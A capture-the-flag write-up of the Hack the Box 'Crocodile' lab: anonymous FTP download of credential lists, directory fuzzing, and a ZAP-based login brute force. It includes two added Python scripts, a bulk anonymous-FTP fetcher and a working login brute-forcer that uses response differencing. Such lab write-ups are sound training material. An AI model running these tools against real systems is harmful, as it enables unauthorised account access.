Hack the Box — Crocodile

James Pearson
4 min read · Aug 19, 2023

HTB Tags: #Linux #PHP #FTP

This is the third box in Tier 1, as part of the Starting Point series, with a focus on directory fuzzing and brute forcing logins on a Linux target. Let’s start by enumerating with the standard commands, ping and nmap.

ping

ping $IP -c 4

nmap

nmap -sC -sV -A $IP -p-

ftp

So we have an open FTP port that accepts anonymous logins. Let’s see what we get.

ftp $IP

Points to note here are the use of ls to list files and mget to download all the files. When mget asks for confirmation with the [anpqy?]? prompt, the letters mean "All, No, Prompt off, Quit, Yes" (and ? for help) for the files you are downloading. You can use wildcards if required, such as * for all.

Checking out the files we see that they are a list of usernames and a list of passwords.
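As an added example (not code from the original write-up), the same anonymous pull can be scripted with Python's ftplib, which avoids answering the [anpqy?]? prompt per file and leaves you with the lists ready to feed into a brute forcer. The FakeFTP class is a constructed stand-in with made-up file contents so the example runs offline; anonymous_fetch is the real-target path.

```python
"""Anonymous FTP pull of every file in the listing, non-interactively.
Added example, not part of the original write-up."""
from ftplib import FTP, error_perm
import os


def fetch_all(ftp):
    """Return {remote_name: bytes} for every entry in the current directory.
    `ftp` only needs nlst() and retrbinary(), so it can be a real ftplib.FTP
    or an offline stand-in."""
    loot = {}
    for name in ftp.nlst():
        if name in (".", ".."):
            continue
        chunks = []
        try:
            ftp.retrbinary("RETR " + name, chunks.append)
        except error_perm:        # directories / unreadable entries: skip, keep going
            continue
        loot[name] = b"".join(chunks)
    return loot


def parse_list(data):
    """Split a downloaded list (users or passwords) into non-empty, stripped lines."""
    return [ln.strip() for ln in data.decode("utf-8", "replace").splitlines() if ln.strip()]


def save_all(loot, dest_dir):
    """Write each downloaded file under dest_dir (basename only, no path tricks)."""
    os.makedirs(dest_dir, exist_ok=True)
    for name, data in loot.items():
        with open(os.path.join(dest_dir, os.path.basename(name)), "wb") as fh:
            fh.write(data)


def anonymous_fetch(host, dest_dir="loot"):
    """Real run: ftplib's login() with no arguments sends anonymous/anonymous@."""
    with FTP(host, timeout=10) as ftp:
        ftp.login()
        loot = fetch_all(ftp)
    save_all(loot, dest_dir)
    return loot


class FakeFTP:
    """Constructed stand-in so the example runs offline; contents are made up."""
    FILES = {
        "users.txt": b"alice\nbob\noperator\n",
        "passwords.txt": b"Password1\nletmein\n\n",
        "pub": None,            # a directory: RETR answers 550
    }

    def nlst(self):
        return list(self.FILES)

    def retrbinary(self, cmd, callback):
        name = cmd.split(" ", 1)[1]
        if self.FILES.get(name) is None:
            raise error_perm("550 Not a plain file.")
        callback(self.FILES[name])


def demo():
    """Offline run against the fake server; returns parsed lists per file."""
    loot = fetch_all(FakeFTP())
    return {name: parse_list(data) for name, data in loot.items()}


if __name__ == "__main__":
    print(demo())
```

Note that fetch_all keeps going when RETR fails on a directory entry rather than aborting the whole pull, which is what a scripted mget should do.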

website

The website looks like any other; in this case all of the links stay internal to the page.

gobuster

With nothing on the web pages themselves, let's check for hidden directories by directory fuzzing.

gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txt

We find a few interesting folders, especially one called /dashboard. Reviewing this provides us with a login page.

zap

OK, we have now found the login page, so let's start up OWASP ZAP and, using the built-in browser, submit a username and password.

Needless to say we failed to gain access but have recorded the details within ZAP.

Within ZAP we have the Request and Response tabs. These show the headers and body sent from client to server (the Request) and back from server to client (the Response).

Here we see the actual html code for the failure:

In order to start the brute force attack, we need to use the built-in Fuzz tool. Right click within the Request tab and select Fuzz:

Firstly remove any active Fuzz locations by clicking Remove from the right side menu. Next we will add the test_user as the first Fuzz location. So highlight and click Add:

This opens up a Payload window. Now click Add and we get the option to select a payload, with a drop down menu for different types.

In this case we know we already have the two files, so find the first user list and then Add.

Now we see the payload we have just added.

Click on OK and then do the same for the password field. We should now be ready to start the Fuzzer.

Similar to Burp Suite, this will not tell you which login is correct, but by sorting on the Size Resp. Body column we will see a noticeable difference: the failed attempts all return the same login page, so the one response of a different size is the one worth checking.

Here we see that the 1258-byte response is different from all the other attempts that were run, which points us to the username:password pair we need to use.
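The Fuzzer run above, as an added example in Python (not code from the original write-up): every user × password pair is posted, each response is reduced to (status, body size), and whichever attempt differs from the majority failure signature is reported, which is the same differencing done by hand on the Size Resp. Body column. LOGIN_URL and the field names `username`/`password` are assumptions; take the real values from the request captured in ZAP. The fake_send server, USERS, PASSWORDS and VALID are constructed so the example runs offline.

```python
"""Login brute force with response differencing (status + body size).
Added example; the target URL and form field names are assumptions."""
import itertools
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter

LOGIN_URL = "http://10.10.10.10/dashboard/login.php"   # assumption: placeholder target and path


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 3xx: a successful login often answers with a redirect, and
    following it would replace the signature we want to compare."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None   # urllib then raises HTTPError carrying the 3xx status


OPENER = urllib.request.build_opener(NoRedirect)


def http_post(url, fields):
    """POST a form; return (status, body_size), the two values ZAP's table shows."""
    body = urllib.parse.urlencode(fields).encode()
    req = urllib.request.Request(
        url, data=body, headers={"Content-Type": "application/x-www-form-urlencoded"})
    try:
        with OPENER.open(req, timeout=10) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:   # 3xx/4xx/5xx responses still carry a body
        return err.code, len(err.read())


def spray(users, passwords, send=http_post, url=LOGIN_URL):
    """Try every user x password pair, as two Fuzz locations do in ZAP."""
    results = []
    for user, pw in itertools.product(users, passwords):
        status, size = send(url, {"username": user, "password": pw})  # assumed field names
        results.append((user, pw, status, size))
    return results


def find_outliers(results):
    """Most attempts fail identically; any (status, size) that differs from that
    majority signature is a candidate. Returns [(user, password), ...]."""
    signatures = Counter((status, size) for _, _, status, size in results)
    baseline = signatures.most_common(1)[0][0]
    return [(u, p) for u, p, status, size in results if (status, size) != baseline]


# --- constructed stand-in server so the example runs offline ---------------
USERS = ["alice", "bob", "operator"]
PASSWORDS = ["Password1", "letmein", "hunter2"]
VALID = ("operator", "letmein")   # made-up credentials for the fake


def fake_send(url, fields):
    """Failures re-render the login page (200, same length); success redirects."""
    if (fields["username"], fields["password"]) == VALID:
        return 302, 0
    return 200, 1304


def demo():
    """Offline run against the fake; returns the outlier pair(s)."""
    return find_outliers(spray(USERS, PASSWORDS, send=fake_send))


if __name__ == "__main__":
    print(demo())
```

Two caveats when pointing this at a real target: if find_outliers returns many pairs the baseline is probably wrong (lockout, rate limiting or a CSRF token that changes the page size on every request), and the body size alone can be identical for success and failure, which is why the status code is part of the signature.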

Once we sign in, we are given a server manager dashboard, with the flag showing front and centre!!

summary

A great little challenge, which covers brute forcing from ZAP or Burp Suite. If you get some time try out hydra to get the correct password.


James Pearson

20+ years in an IT environment, working for companies such as Synstar, HP, DXC and Capgemini in a number of different service areas. Now a cyber CTF addict.